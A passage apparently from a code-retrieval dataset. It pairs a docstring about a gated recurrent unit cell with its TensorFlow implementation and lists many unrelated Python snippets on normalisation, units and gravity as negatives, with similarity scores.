= pd.DataFrame(\n data=self.data[\"data\"],\n columns=self.data[\"columns\"],\n index=self.data[\"index\"],\n )", "def normalize(self) -> None:\n assert hasattr(self, \"characterized_inventory\"), \"Must do lcia first\"\n if not hasattr(self, \"normalization_matrix\"):\n self.load_normalization_data()\n self.normalization_calculation()", "def normalized_rankings(df, columns=['Lust', 'Envy', 'Greed', 'Sloth', 'Wrath',\n 'Pride', 'Gluttony']):\n df[columns] = (df[columns] - 4) / 2 # hard coding n=7 case for now", "def norm_data(self):\n if (self.nrows, self.ncolumns) < self.data.shape:\n self.data = self.data[0:self.nrows, 0:self.ncolumns]\n if self.data.dtype != np.float64:\n self.data = self.data.astype(np.float64)\n self.meanval = self.data.mean()\n self.stdval = self.data.std()", "def normalize(self, df):\n return (df - df.mean()) / (df.max() - df.min())", "def __init__(self):\n super().__init__(\n func=lambda x: pandas.DataFrame((x - x.min()) / (x.max() - x.min())),\n feature_names_out=\"one-to-one\",\n validate=True,\n )\n return None", "def normalize(data):\n # normalize data and return\n # https://stackoverflow.com/questions/29661574/normalize-numpy-array-columns-in-python\n return (data - data.min(axis=0)) / data.ptp(axis=0)", "def normalise(x):\n x = np.copy(x)\n n_cols = x.shape[1]\n for col_index in range(n_cols):\n col = x[:, col_index]\n factor = np.max(col)\n x[:, col_index] = col / factor\n\n return x", "def unscale(self, columns):\n self.verify_columns_in_dataset(columns)\n\n for col in columns:\n scaler, scaled = self.scalers.get(col, (0, 0))\n if not scaled:\n logging.info(\"column '%s' has not been scaled, ignoring\" % col)\n continue\n\n self.train.loc[:, col] = scaler.inverse_transform(self.train[col])\n self.test.loc[:, col] = scaler.inverse_transform(self.test[col])\n self.scalers[col][1] = False # mark not scaled", "def _make_blank(cls) -> pd.DataFrame:\n spec = list(zip(cls._required_columns, cls._required_dtypes))\n try:\n arr = np.zeros(0, dtype=spec)\n return pd.DataFrame(arr)\n except TypeError as exc:\n raise TypeError(r\"{exc}: {spec}\") from exc", "def init_from_data(self, data):\n self.data = data\n self.norm_data()", "def __init__(self, columns): #, length_scale, length_scale_bounds=()):\n# assert isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.columns = columns \n\n kernels = [Projection([c]) for c in columns]\n #factor_name(c)) for c in columns]\n \n # collect all the kernels to be combined into a single product kernel\n super(SimpleFactorKernel, self).__init__(kernels)", "def as_columns(self, **columns):\n return self.__class__.from_columns(columns, self.meta)\n # return self.__class__(self.data.loc[:, columns], self.meta.copy())", "def own_MinMaxColumnScaler(df, columns):\n for col in columns:\n new_col_name = col + '_scld'\n col_min = df[col].min()\n col_max = df[col].max()\n df[new_col_name] = (df[col] - col_min) / (col_max - col_min)", "def normalizeRows(x):\n\n ### YOUR CODE HERE\n norm2 = np.linalg.norm(x,2,axis = 1).reshape(x.shape[0],-1)\n x = x/norm2\n ### END YOUR CODE\n\n return x", "def prepare_input_df(df: DataFrame) -> DataFrame:\r\n df = df.fillna('') # Fill np.nan values with blanks (\"\").\r\n df = to_upper(df) # Force case to UPPER for all columns.\r\n df = strip_columns(df) # Remove trailing whitespace.\r\n return df", "def data_column_conversion(data:pandas.core.frame.DataFrame) -> pandas.core.frame.DataFrame:\n data = data.assign(W = (data.label == 'W') + 0,D = (data.label == 'D') + 0,L = (data.label == 'L') + 0)\n data = data.drop(\"label\",axis=1)\n return data", "def normalize(self):\n self.length = np.ones(self.nV)\n return self", "def init_columns(self, project, columns):\n self.projects.update_entry(pk=project, project={\"columns\": []}).result()\n cols = []\n\n for path, unit in columns.items():\n col = {\"path\": f\"data.{path}\"}\n if unit is not None:\n col[\"unit\"] = unit\n\n cols.append(col)\n\n return self.projects.update_entry(\n pk=project, project={\"columns\": cols}\n ).result()", "def prepopulate(self, model, exclude=[]):\n for col in model.columns():\n if col not in exclude and hasattr(self, col):\n setattr(getattr(self, col), 'data', getattr(model, col))", "def fromTable(cls, table):\n cls.__attrmap__ = {}\n cls.__colmap__ = {}\n allColumns = list(table)\n for column in allColumns:\n attrname = cls.namingConvention(column.model.name)\n cls.__attrmap__[attrname] = column\n cls.__colmap__[column] = attrname", "def normalize(self):\n self.desc += \", normalize\"\n self._vecs /= np.linalg.norm(self._vecs, axis=1)[:, np.newaxis]\n self.reindex()", "def __clean_df(self):\n self.__convert_min()", "def normalize(self,matrix):\n for i in range(self.N):\n matrix[self.N-1][i] = 0\n for i in range(self.n):\n matrix[self.N - 1][self.index(i,i)] = 1\n return matrix", "def normalize (a_data,a_column,b_method='MinMax') :\n if b_method == 'MinMax' :\n loc_scaler = __minmax()\n a_data[a_column] = loc_scaler.fit_transform(a_data[a_column])\n elif b_method == 'Standard' :\n loc_scaler = __standard()\n a_data[a_column] = loc_scaler.fit_transform(a_data[a_column])", "def __init__(self, *args, **kwargs):\n \n self.dense = True\n\n # Create table\n super().__init__(*args, **kwargs)", "def fit(self, col_df: dd.Series) -> Any:\n\n self.min = col_df.min()\n self.max = col_df.max()\n return self", "def __init__(self, data, columns):\n super().__init__()\n self._filters = {}\n self._columns = [Column(column) for column in columns]\n self._source = pd.DataFrame(data, columns=[column.name for column in self._columns], dtype=str)\n # Change columns datatypes\n for name, type in [(column.name, column.type) for column in self._columns]:\n if type == 'NUMBER':\n self._source[name] = self._source[name].astype('float')\n elif type == 'INTEGER':\n # self._source[name] = self._source[name].round()\n self._source[name] = self._source[name].astype('float')\n self._source[name].fillna(float(0), inplace=True)\n self._source[name] = self._source[name].astype(int)\n elif type in ['DATE', 'DATETIME', 'TIME']:\n self._source[name] = pd.to_datetime(self._source[name])\n elif type == 'BOOL':\n self._source[name] = self._source[name].apply(lambda x: str(x).upper() == 'TRUE').astype('bool')\n\n self._visable_columns = [column.name for column in self._columns if\n column.title is not None and column.visable == True]\n self._dataframe = self._source.loc[:, self._visable_columns]", "def create_dummies(df):", "def norm_data(df):\n cols = df.columns\n sum = df.sum(axis=1)\n df_new = df.loc[:,cols[1]:cols[-1]].div(sum, axis=0)\n return df_new", "def normalize_distancematrix(self):\n INF = self.distmat.max().max()\n df = self.distmat.fillna(INF)\n self.distmat = (df - df.min()) / (df.max() - df.min())", "def __init__(self, df, categorical_columns):\n self.num_to_name = {}\n self.name_to_num = {}\n for c in categorical_columns:\n self.num_to_name[c] = dict(enumerate(df[c].unique()))\n self.name_to_num[c] = {v: k for k, v in self.num_to_name[c].items()}", "def _normalize_column(self, data, coerce_dtype=None, store_categories=True):\n if coerce_dtype is not None:\n coerce_dtype = np.dtype(coerce_dtype)\n\n if np.isscalar(data):\n array = np.array([data], dtype=coerce_dtype)\n dtype = data.dtype\n fillvalue = None\n\n elif is_categorical(data):\n if store_categories:\n cats = data.cat.categories\n enum_dict = dict(zip(cats, range(len(cats))))\n array = data.cat.codes\n dtype = h5py.special_dtype(enum=(array.dtype, enum_dict))\n fillvalue = -1\n else:\n array = data.cat.codes\n dtype = coerce_dtype or array.dtype\n fillvalue = -1\n\n elif data.dtype in (object, str, bytes):\n data = np.asarray(data)\n dtype = np.dtype(\"S\")\n array = np.array(data, dtype=dtype)\n fillvalue = None\n\n else:\n array = np.asarray(data)\n dtype = data.dtype\n fillvalue = None\n\n return array, dtype, fillvalue", "def replace(self, dictionary):\n for column in self.__table__.columns.keys():\n setattr(self, column, None)\n self.from_dict(dictionary)", "def unscale(self, columns):\n self.verify_columns_in_dataset(columns)\n\n for col in columns:\n scaler, scaled = self.scalers.get(col, (0, 0))\n if not scaled:\n logging.info(\"column '%s' has not been scaled, ignoring\" % col)\n continue\n\n self.dataset.loc[:, col] = \\\n scaler.inverse_transform(self.dataset[col])\n self.scalers[col][1] = False", "def __init__(self, colinds):\n self._colinds = colinds", "def __init__(self, columns, values=[], row_number=None, source_row_number=None):\n self.columns = columns\n self.values = copy.copy(values)\n self.row_number = row_number\n self.source_row_number = source_row_number", "def normalizeRows(x):\n\n ### YOUR CODE HERE\n # using l2 norm to normalize\n x = x / np.sqrt(np.sum(x * x, axis=-1, keepdims=True))\n ### END YOUR CODE\n\n return x" ]
[ "0.62527007", "0.61988616", "0.6170687", "0.6163979", "0.601633", "0.59947926", "0.5964604", "0.59518266", "0.5946991", "0.5934487", "0.5933899", "0.59310675", "0.59298176", "0.587819", "0.5838801", "0.5835919", "0.5826909", "0.5814432", "0.5814432", "0.5799486", "0.5779557", "0.5776756", "0.5772984", "0.576165", "0.574795", "0.5745722", "0.5740217", "0.5739378", "0.5730491", "0.5724968", "0.5720187", "0.5710221", "0.5690427", "0.5676085", "0.5670871", "0.5657949", "0.5638853", "0.56357366", "0.56276315", "0.56275976", "0.5603842", "0.5594656", "0.5589582", "0.55653214", "0.5565045", "0.5556466", "0.5546937", "0.5546363", "0.5542289", "0.55396205", "0.55374503", "0.55364865", "0.55252105", "0.5524995", "0.5513348", "0.5498207", "0.54932594", "0.5486765", "0.54850656", "0.54739827", "0.54739827", "0.54636705", "0.54472536", "0.5441863", "0.5434735", "0.5432687", "0.5420312", "0.5408455", "0.5406406", "0.54042804", "0.5399645", "0.5399614", "0.5398987", "0.5398797", "0.53929716", "0.53845245", "0.53809965", "0.53785825", "0.5374447", "0.5361605", "0.5359702", "0.53592736", "0.5357277", "0.53546405", "0.5351229", "0.534927", "0.5337756", "0.53353906", "0.53298074", "0.5326293", "0.5322299", "0.53159064", "0.5313394", "0.5308091", "0.5294137", "0.5291782", "0.52847874", "0.5283369", "0.5282616", "0.52786386", "0.52775395" ]
0.0
-1
Gated recurrent unit (GRU) with nunits cells.
def call(self, inputs, state): x, new = inputs while len(state.get_shape().as_list()) > len(new.get_shape().as_list()): new = tf.expand_dims(new,len(new.get_shape().as_list())) h = state * (1.0 - new) hx = tf.concat([h, x], axis=1) mr = tf.sigmoid(tf.matmul(hx, self.w1) + self.b1) # r: read strength. m: 'member strength m, r = tf.split(mr, 2, axis=1) rh_x = tf.concat([r * h, x], axis=1) htil = tf.tanh(tf.matmul(rh_x, self.w2) + self.b2) h = m * h + (1.0 - m) * htil return h, h
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_gru_cell(num_units, dropout):\n cell = tf.nn.rnn_cell.GRUCell(num_units)\n if dropout:\n result = tf.nn.rnn_cell.DropoutWrapper(cell,\n output_keep_prob=1-dropout)\n return result", "def _initialize_gru_cell(self, num_units):\n return gru_cell.LayerNormGRUCell(\n num_units,\n w_initializer=self.uniform_initializer,\n u_initializer=random_orthonormal_initializer,\n b_initializer=tf.constant_initializer(0.0))", "def GRU(previous_hidden_state, x):\n # R Gate\n r = tf.sigmoid(tf.matmul(x, Wr) + \\\n tf.matmul(previous_hidden_state, Ur) + br)\n # U Gate\n u = tf.sigmoid(tf.matmul(x, Wu) + \\\n tf.matmul(previous_hidden_state, Uu) + bu)\n # Final Memory cell\n c = tf.tanh(tf.matmul(x, Wh) + \\\n tf.matmul( tf.multiply(r, previous_hidden_state), Uh) + bh)\n # Current Hidden state\n current_hidden_state = tf.multiply( (1 - u), previous_hidden_state ) + \\\n tf.multiply( u, c )\n return current_hidden_state", "def G(U):\n n = U.shape[0]\n G_U = np.zeros([n,1])\n DELTA_x = float(2*L)/(n-1)\n for i in range(n):\n G_U[i][0] = U[(i+1)%n][0]\n G_U[i][0] -= U[(i-1)%n][0]\n G_U[i][0] /= (2* DELTA_x)\n G_U[i][0] += (float(epsilon) * (U[(i+1)%n][0]- U[(i-1)%n][0]) * (U[(i-1)%n][0]+U[(i+1)%n][0]+ U[i][0])/ (4* DELTA_x))\n G_U[i][0] += (float(epsilon) * (U[(i+2)%n][0]- 2*U[(i+1)%n][0]+ 2*U[(i-1)%n][0]- U[(i-2)%n][0]) / (12*( DELTA_x**3)))\n return G_U", "def ug(micrograms):\n return Unit(micrograms,\"microgram\")", "def _single_cell(num_units,\n dropout,\n mode,\n residual_connection=False,\n device_str=None):\n dropout = dropout if mode == tf.estimator.ModeKeys.TRAIN else 0.0\n\n # Cell Type\n utils.print_out(\" GRU\", new_line=False)\n single_cell = tf.nn.rnn_cell.GRUCell(num_units)\n\n # Dropout (= 1 - keep_prob)\n if dropout > 0.0:\n single_cell = tf.nn.rnn_cell.DropoutWrapper(\n cell=single_cell, input_keep_prob=(1.0 - dropout))\n utils.print_out(\n \" %s, dropout=%g \" % (type(single_cell).__name__, dropout),\n new_line=False)\n\n # Residual\n if residual_connection:\n single_cell = tf.nn.rnn_cell.ResidualWrapper(single_cell)\n utils.print_out(\" %s\" % type(single_cell).__name__, new_line=False)\n\n # Device Wrapper\n if device_str:\n single_cell = tf.nn.rnn_cell.DeviceWrapper(single_cell, device_str)\n utils.print_out(\n \" %s, device=%s\" % (type(single_cell).__name__, device_str),\n new_line=False)\n\n return single_cell", "def grid_unit_cell(self):\n from cctbx import uctbx\n a = self.unit_cell_parameters[0] / self.unit_cell_grid[0]\n b = self.unit_cell_parameters[1] / self.unit_cell_grid[1]\n c = self.unit_cell_parameters[2] / self.unit_cell_grid[2]\n alpha,beta,gamma = self.unit_cell_parameters[3:6]\n return uctbx.unit_cell((a,b,c,alpha,beta,gamma))", "def num_grna(self) -> int:\n return len(self.gRNAs)", "def get_u0_g(self, gmag):\n return self.ginterpolator(gmag)", "def gru_cell(self, Xt, h_t_minus_1):\n # 1.update gate: decides how much past information is kept and how much new information is added.\n z_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_z) + tf.matmul(h_t_minus_1,self.U_z) + self.b_z) # z_t:[batch_size,self.hidden_size]\n # 2.reset gate: controls how much the past state contributes to the candidate state.\n r_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_r) + tf.matmul(h_t_minus_1,self.U_r) + self.b_r) # r_t:[batch_size,self.hidden_size]\n # candiate state h_t~\n h_t_candiate = tf.nn.tanh(tf.matmul(Xt, self.W_h) +r_t * (tf.matmul(h_t_minus_1, self.U_h)) + self.b_h) # h_t_candiate:[batch_size,self.hidden_size]\n # new state: a linear combine of pervious hidden state and the current new state h_t~\n h_t = (1 - z_t) * h_t_minus_1 + z_t * h_t_candiate # h_t:[batch_size*num_sentences,hidden_size]\n return h_t", "def gelu(input):\n return FunctionLib.apply('Gelu', input.device, [input], approximate=False)", "def base_unit() -> ureg:\n return ureg.meter", "def G(self):\n return self._properties['G']", "def calc_free_g(energies, temperatures):\n pass", "def test_gri_reduction(self):\n model_file = 'gri30.cti'\n\n # Conditions for reduction\n conditions = [\n InputIgnition(\n kind='constant volume', pressure=1.0, temperature=1000.0, equivalence_ratio=1.0,\n fuel={'CH4': 1.0}, oxidizer={'O2': 1.0, 'N2': 3.76}\n ),\n InputIgnition(\n kind='constant volume', pressure=1.0, temperature=1200.0, equivalence_ratio=1.0,\n fuel={'CH4': 1.0}, oxidizer={'O2': 1.0, 'N2': 3.76}\n ),\n ]\n data_files['output_ignition'] = relative_location(\n os.path.join('assets', 'example_ignition_output.txt')\n )\n data_files['data_ignition'] = relative_location(\n os.path.join('assets', 'example_ignition_data.dat')\n )\n error = 5.0\n\n # Run DRG\n with TemporaryDirectory() as temp_dir:\n reduced_model = run_drgep(\n model_file, conditions, [], [], error, ['CH4', 'O2'], ['N2'], \n num_threads=1, path=temp_dir\n )\n\n # Expected answer\n expected_model = ct.Solution(relative_location(os.path.join('assets', 'drgep_gri30.cti')))\n \n # Make sure models are the same\n assert check_equal(reduced_model.model.species_names, expected_model.species_names)\n assert reduced_model.model.n_reactions == expected_model.n_reactions\n assert round(reduced_model.error, 2) == 3.22", "def get_rm(g):\n return 1 / g", "def unit_of_measurement(self):\n return UNIT_GALLONS_PER_MINUTE", "def g(self, RD):\n g = 1 / np.sqrt((1 + 3 * np.power(self.q, 2)) / np.power(np.pi, 2)) \n \n return g", "def reciprocal_cell(self):\n return self.unit_cell.reciprocal()", "def ng(nanograms):\n return Unit(nanograms,\"nanogram\")", "def compile_gru_model(input_dim=101, output_dim=4563, recur_layers=3, nodes=1000,\n conv_context=11, conv_border_mode='valid', conv_stride=2,\n initialization='glorot_uniform', batch_norm=True, num_gpu=1):\n logger.info(\"Building gru model\")\n # Main acoustic input\n acoustic_input = Input(shape=(None, input_dim), name='acoustic_input')\n\n # Setup the network\n #conv_1d = Conv1D(nodes, conv_context, name='conv_1d',\n # padding='same', strides=conv_stride,\n # kernel_initializer=initialization,\n # activation='relu')(acoustic_input)\n conv_1d = Convolution1D(nodes, conv_context, name='conv1d',\n border_mode=conv_border_mode,\n subsample_length=conv_stride, init=initialization,\n activation='relu')(acoustic_input)\n if batch_norm:\n output = normalization.BatchNormalization(name='bn_conv_1d')(conv_1d, training=True)\n else:\n output = conv_1d\n\n for r in range(recur_layers):\n # output = GRU(nodes, activation='relu',\n # name='rnn_{}'.format(r + 1), init=initialization,\n # return_sequences=True)(output)\n output = Bidirectional(GRU(nodes, return_sequences=True),name='bi_lstm_{}'.format(r + 1))(output)\n if batch_norm:\n bn_layer = normalization.BatchNormalization(name='bn_rnn_{}'.format(r + 1),moving_mean_initializer='zeros')\n output = bn_layer(output, training=True)\n\n network_output = TimeDistributed(Dense(\n output_dim+1, name='dense', activation='softmax', init=initialization,\n ))(output)\n model = Model(input=acoustic_input, output=network_output)\n #model.conv_output_length = lambda x: conv_output_length(\n # x, conv_context, conv_border_mode, conv_stride)\n # model = ParallelModel(model, num_gpu)\n return model", "def gon(self):\n return dec2gon(self.dec())", "def gon(self):\n return dec2gon(self.dec())", "def geglu(x: Tensor) ->Tensor:\n assert x.shape[-1] % 2 == 0\n a, b = x.chunk(2, dim=-1)\n return a * F.gelu(b)", "def get_molec_uc_to_mg_g(isot_dict):\n if 'conversion_factor_molec_uc_to_gr_gr' in isot_dict.get_dict():\n molec_uc_to_mg_g = isot_dict['conversion_factor_molec_uc_to_gr_gr']\n elif 'conversion_factor_molec_uc_to_mg_g' in isot_dict.get_dict():\n molec_uc_to_mg_g = isot_dict['conversion_factor_molec_uc_to_mg_g']\n return molec_uc_to_mg_g", "def cellGradx(self):\n if getattr(self, '_cellGradx', None) is None:\n G1 = self._cellGradxStencil()\n # Compute areas of cell faces & volumes\n V = self.aveCC2F*self.vol\n L = self.r(self.area/V, 'F','Fx', 'V')\n self._cellGradx = sdiag(L)*G1\n return self._cellGradx", "def standard_gravity():\n mu = 3.986004418E14\n return mu", "def get_rec_rate_grain(ne, G0, T, Z):\n \n psi = G0*T**0.5/ne\n return RecRate.get_alpha_gr(T, psi, Z)", "def compute_gravity(self):\r\n # compute the gravity from the Gauss form.\r\n # if it fails, marks divergence\r\n try:\r\n self.gravsolver.solve()\r\n except:\r\n print(\"GRAVITY DIVERGED\")\r\n\r\n # write to log\r\n self.logfile.write(\"%s: STOPPED DUE TO DIVERGENCE IN GRAVITY \\n\" %\r\n (self.convert_time(time.time() -\r\n self.start_time)))\r\n self.diverged = True # set diverged to True, break the run\r\n return\r\n\r\n # split and update the gravity function with the answers\r\n # note the gravscale\r\n gravg, gravs = self.gravgs.split()\r\n\r\n # assign the result to the gravity function\r\n self.gravity.assign(project(gravg/self.gravscale, self.V))", "def ndcg_per_epoch(self):\n return self.val_ndcg", "def g(self, r, mu):\n\n return np.sqrt(1. - (r / self.R)**2 * (1. - mu**2))", "def generation(self) -> int:\n return self._g", "def unit(g, node_1, node_2):\n return 1", "def gpus(self):\n return self.__gpus", "def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bidirectional=False,\n dropout=0,\n **kwargs\n ):\n super(GRU, self).__init__(\n 'gru', input_size, hidden_size,\n num_layers, bidirectional, dropout, **kwargs\n )", "def genRate(self):\n\n # We need to compute normEsquared before we can compute the generation\n # rate\n normEsq = self.get_scalar_quantity('normEsquared')\n # Prefactor for generation rate. Note we gotta convert from m^3 to\n # cm^3, hence 1e6 factor\n fact = consts.epsilon_0 / (consts.hbar * 1e6)\n gvec = np.zeros_like(normEsq)\n # Main loop to compute generation in each layer\n freq = self.conf[('Simulation', 'params', 'frequency')]\n for name, layer in self.layers.items():\n self.log.debug('LAYER: %s', name)\n self.log.debug('LAYER T: %f', layer.thickness)\n self.log.debug('START: %f', layer.start)\n self.log.debug('END: %f', layer.end)\n # Use the layer object to get the nk matrix with correct material\n # geometry\n nmat, kmat = layer.get_nk_matrix(freq, self.X, self.Y)\n gvec[layer.get_slice(self.Z)] = fact * nmat * kmat * normEsq[layer.get_slice(self.Z)]\n # gvec[layer.get_slice()] = nmat * kmat * normEsq[layer.get_slice(self.Z)]\n self.extend_data('genRate', gvec)\n return gvec", "def n(G):\n return G._n", "def getNumLGR(self):\n return self._num_lgr( )", "def _sum_g_i(self) -> float:\n elems = self.composition.get_el_amt_dict()\n\n if self.interpolated:\n sum_g_i = 0\n for elem, amt in elems.items():\n g_interp = interp1d(\n [float(t) for t in G_ELEMS.keys()],\n [g_dict[elem] for g_dict in G_ELEMS.values()],\n )\n sum_g_i += amt * g_interp(self.temp)\n else:\n sum_g_i = sum(amt * G_ELEMS[str(self.temp)][elem] for elem, amt in elems.items())\n\n return sum_g_i", "def expected_g(self):\n raise NotImplementedError()\n # \\sum_{b} \\gamma_b\n trm2 = self.mf_gamma.sum(axis=2)\n E_g = self.mf_gamma / trm2[:,:,None]\n return E_g", "def GravityVector(self):\n if self.Cid() == 0:\n return self.N\n ## TODO: shouldn't be scaled by the ???\n p = self.cid_ref.transform_vector_to_global(self.N)\n return self.scale * p", "def gru(params, h, x):\n bfg = 0.5\n hx = np.concatenate([h, x], axis=0)\n ru = sigmoid(np.dot(params['wRUHX'], hx) + params['bRU'])\n r, u = np.split(ru, 2, axis=0)\n rhx = np.concatenate([r * h, x])\n c = np.tanh(np.dot(params['wCHX'], rhx) + params['bC'] + bfg)\n return u * h + (1.0 - u) * c", "def g(self):\n return 2", "def gagged(self):\r\n return self._gag", "def M_g(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating g\", file=self.logfile)\n M_mu1 = np.lib.stride_tricks.as_strided(self.mu_pad,\n shape=[self.P+1, self.L_h],\n strides=[self.mu_pad.strides[-1], self.mu_pad.strides[-1]])\n\n M_mu1 = M_mu1[::-1,:]\n M_mu2 = np.transpose(M_mu1[1:,:])\n M_mu1 = M_mu1*self.e2\n\n M_mu = np.dot(M_mu1, M_mu2)\n v_mu = M_mu[0,:]\n M_mu = M_mu[1:,:]\n\n M_R = np.zeros((self.P,self.P+1))\n for p in range(1,self.P+1):\n for q in range(0,self.P+1):\n M_R[p-1,q] = np.sum(np.diag(self.R, q-p)[:self.L_h-max(p,q)]*self.e2[max(p,q):self.L_h])\n\n v_R = M_R[:,0]\n M_R = M_R[:,1:]\n\n self.alpha_g = np.dot(np.linalg.inv(M_mu + M_R), v_mu+v_R)\n self.A = np.concatenate([[1], -self.alpha_g])\n\n self._propagate_A()", "def get_diffgrid(u_current, u_fine, dt):\n \n N_current = len(u_current[:,0])\n N_fine = len(u_fine[:,0])\n \n grid_size_ratio = ceil(N_fine/float(N_current))\n \n diffgrid = dt * numpy.sum( numpy.abs(\\\n u_current[:,2]- u_fine[::grid_size_ratio,2])) \n \n return diffgrid", "def updateG(self, dt):\n\t\tself.tissue.G.project( (self.initial * dt + Identity(3)) * self.tissue.G )", "def getGeneratingUnit(self):\n return self._GeneratingUnit", "def genu(self):\n # Check coordinates are defined\n if self._genu is None:\n raise RuntimeError(\"Coordinates not defined for station \" + self._code)\n return self._genu", "def get_upregulated_genes_network(self) -> Graph:\n logger.info(\"In get_upregulated_genes_network()\")\n\n deg_graph = self.graph.copy() # deep copy graph\n not_diff_expr = self.graph.vs(up_regulated_eq=False)\n\n # delete genes which are not differentially expressed or have no connections to others\n deg_graph.delete_vertices(not_diff_expr.indices)\n deg_graph.delete_vertices(deg_graph.vs.select(_degree_eq=0))\n\n return deg_graph", "def _get_gpos ( self ):\n bpos = mgrid[self.x_min:self.x_max:self.nxsteps*1j, \\\n self.y_min:self.y_max:self.nysteps*1j, \\\n self.z_min:self.z_max:self.nzsteps*1j]\n bpos.resize((3, self.size))\n return bpos", "def test_grovers_minimal_basis_gates(self):\n shots = 2000\n circuits = ref_algorithms.grovers_circuit(final_measure=True,\n allow_sampling=True)\n targets = ref_algorithms.grovers_counts(shots)\n job = execute(circuits, QasmSimulator(), shots=shots, basis_gates='U,CX')\n result = job.result()\n self.is_completed(result)\n self.compare_counts(result, circuits, targets, delta=0.05 * shots)", "def GIoU(self, bboxes1: torch.Tensor, bboxes2: torch.Tensor) -> float:\n iou = IoU(bboxes1, bboxes2)\n giou = 0.0\n return giou", "def fGT(self):\n pass", "def g(self):\n return self.moves", "def test_grovers_waltz_basis_gates(self):\n shots = 2000\n circuits = ref_algorithms.grovers_circuit(final_measure=True,\n allow_sampling=True)\n targets = ref_algorithms.grovers_counts(shots)\n job = execute(circuits, QasmSimulator(), shots=shots, basis_gates='u1,u2,u3,cx')\n result = job.result()\n self.is_completed(result)\n self.compare_counts(result, circuits, targets, delta=0.05 * shots)", "def grand_total(self):\n return sum(self.grid[pos][1] for pos in assignable_positions if self.grid[pos][0]) + self.grid[\"nb\"][1]", "def rnn_gru(\n nclass,\n input_shape=(187, 1),\n recurrent_layers=[64, 128],\n dense_layers=[64, 16],\n dropout=0.2,\n binary=False,\n):\n if not binary:\n loss = losses.sparse_categorical_crossentropy\n last_activation = activations.softmax\n else:\n loss = losses.binary_crossentropy\n last_activation = activations.sigmoid\n return_sequences = True\n\n inp = Input(shape=input_shape)\n x = inp\n for i, neurons in enumerate(recurrent_layers):\n x = GRU(neurons, return_sequences=return_sequences)(x)\n x = Dropout(rate=dropout)(x)\n return_sequences = False\n for i, neurons in enumerate(dense_layers):\n x = Dense(neurons, name=f\"dense_{i+1}\", activation=\"relu\")(x)\n x = Dense(nclass, name=\"Output\", activation=last_activation)(x)\n\n model = models.Model(inputs=inp, outputs=x)\n opt = optimizers.Adam(0.001)\n model.compile(optimizer=opt, loss=loss, metrics=[\"acc\"])\n model.summary()\n return model", "def build_rnn_cell(type, num_units, dropout):\n cell = tf.nn.rnn_cell.BasicRNNCell(num_units)\n if dropout:\n result = tf.nn.rnn_cell.DropoutWrapper(cell,\n output_keep_prob=1-dropout)\n return result", "def compute_g_0(self, j):\n #Compute variance and mean denominator (same denominator for both)\n denominator = self.sigma2 * self.sigma_g_star_2[0, j] + (10**8) * self.sigma2\n\n numerator_mean = (10**8) * self.sigma2 * self.g_heat[1,j]\n if (self.u_heat > self.temperatures[0]):\n denominator = denominator + (10**8) * self.sigma_g_star_2[0, j] * ((self.temperatures[0] - self.u_heat )**2)\n numerator_mean = numerator_mean + \\\n (10**8) * self.sigma_g_star_2[0, j] * (self.temperatures[0] - self.u_heat) * (self.consumptions[0] - self.s[0,j] * self.kappa[self.daytypes[0]])\n\n #Mean\n mean = numerator_mean / denominator\n\n #Compute variance numerator\n variance_numerator = ((10**8) * self.sigma2 * self.sigma_g_star_2[0, j])\n #Variance\n variance = variance_numerator / denominator\n\n self.g_heat[0,j] = self.truncated_norm(-inf, 0, mean, variance)", "def generation(x, g):\n return int(x/g)", "def test_ggn_implementation(problem):\n problem.set_up()\n\n diag_ggn_from_full = AutogradExtensions(problem).diag_ggn_via_ggn()\n diag_ggn_from_block = AutogradExtensions(problem).diag_ggn()\n\n check_sizes_and_values(diag_ggn_from_full, diag_ggn_from_block)\n problem.tear_down()", "def Generate_Ginibre(n):\n G_real = np.random.normal(scale= np.sqrt(1/(2*n)), size=[n,n])\n G_im = np.random.normal(scale= np.sqrt(1/(2*n)), size=[n,n]) * complex(0,1)\n G = G_real + G_im\n return G", "def nut(self, guess, sampledU, wallGradU):\n magGradU = np.abs(wallGradU)\n uTau = self.utau(guess, sampledU)\n return np.max([0.0, uTau**2/magGradU - self.nu])", "def calc_gravitational_energy(self):\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j):\n return np.sum((mu[2::2] - mu[:-2:2]) * (star.rho[:-2:2, j] * star.Phi[:-2:2, j] +\n 4 * star.rho[1:-1:2, j] * star.Phi[1:-1:2, j] +\n star.rho[2::2, j] * star.Phi[2::2, j])) / 6\n\n W = 0\n\n for j in range(0, N - 2, 2):\n W += (r[j + 2] - r[j]) * (r[j]**2 * S1(j) +\n 4 * r[j + 1]**2 * S1(j + 1) +\n r[j + 2]**2 * S1(j + 2))\n\n return -1 / 3 * np.pi * W", "def _computeGC2(rupture, lon, lat, depth):\n\n quadlist = rupture.getQuadrilaterals()\n quadgc2 = copy.deepcopy(quadlist)\n\n oldshape = lon.shape\n\n if len(oldshape) == 2:\n newshape = (oldshape[0] * oldshape[1], 1)\n else:\n newshape = (oldshape[0], 1)\n\n # -------------------------------------------------------------------------\n # Define a projection that spans sites and rupture\n # -------------------------------------------------------------------------\n\n all_lat = np.append(lat, rupture.lats)\n all_lon = np.append(lon, rupture.lons)\n\n west = np.nanmin(all_lon)\n east = np.nanmax(all_lon)\n south = np.nanmin(all_lat)\n north = np.nanmax(all_lat)\n proj = OrthographicProjection(west, east, north, south)\n\n totweight = np.zeros(newshape, dtype=lon.dtype)\n GC2T = np.zeros(newshape, dtype=lon.dtype)\n GC2U = np.zeros(newshape, dtype=lon.dtype)\n\n # -------------------------------------------------------------------------\n # First sort out strike discordance and nominal strike prior to\n # starting the loop if there is more than one group/trace.\n # -------------------------------------------------------------------------\n group_ind = rupture._getGroupIndex()\n\n # Need group_ind as numpy array for sensible indexing...\n group_ind_np = np.array(group_ind)\n uind = np.unique(group_ind_np)\n n_groups = len(uind)\n\n if n_groups > 1:\n # ---------------------------------------------------------------------\n # The first thing we need to worry about is finding the coordinate\n # shift. U's origin is \"selected from the two endpoints most\n # distant from each other.\"\n # ---------------------------------------------------------------------\n\n # Need to get index of first and last quad\n # for each segment\n iq0 = np.zeros(n_groups, dtype='int16')\n 